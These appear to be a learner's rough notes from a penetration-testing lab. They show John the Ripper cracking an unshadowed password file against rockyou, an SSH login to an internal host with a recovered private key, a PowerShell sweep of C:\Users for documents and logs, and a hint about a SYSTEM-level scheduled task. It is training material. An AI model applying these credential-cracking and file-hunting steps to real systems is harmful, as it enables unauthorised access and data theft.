└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
---> FAILED..............
Note: MUST add '--format=crypt' for john command!! Otherwise, john will alert as 'no password hashes loaded (see FAQ)' https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded
cd .ssh ssh -i id_rsa mario@172.16.188.14 ---> login successfully!
On 192.168.x.122,
cd /home/mario/.ssh
ssh -i id_rsa mario@172.16.188.14
---> we can found local.txt There is no proof.txt on this host. so we don't need to escalate our priv.
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
来搜索infoJudging by the name of the binary, we could assume maybe there is a ||scheduled task running|| with the context of high value target (Administrator or NT authority\System user) which our current user won't have visibility to check it out using the ||schtasks|| command.
However, we can look for running processes using the same name as the binary suggests. ||watch-command ( (https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1)|| would be a great tool for inspecting service footprints.
I hope this explanation makes sense.
Lab1
Because Kali is in 192.168.x.x subnetwork,so let:s enum the following hosts at first.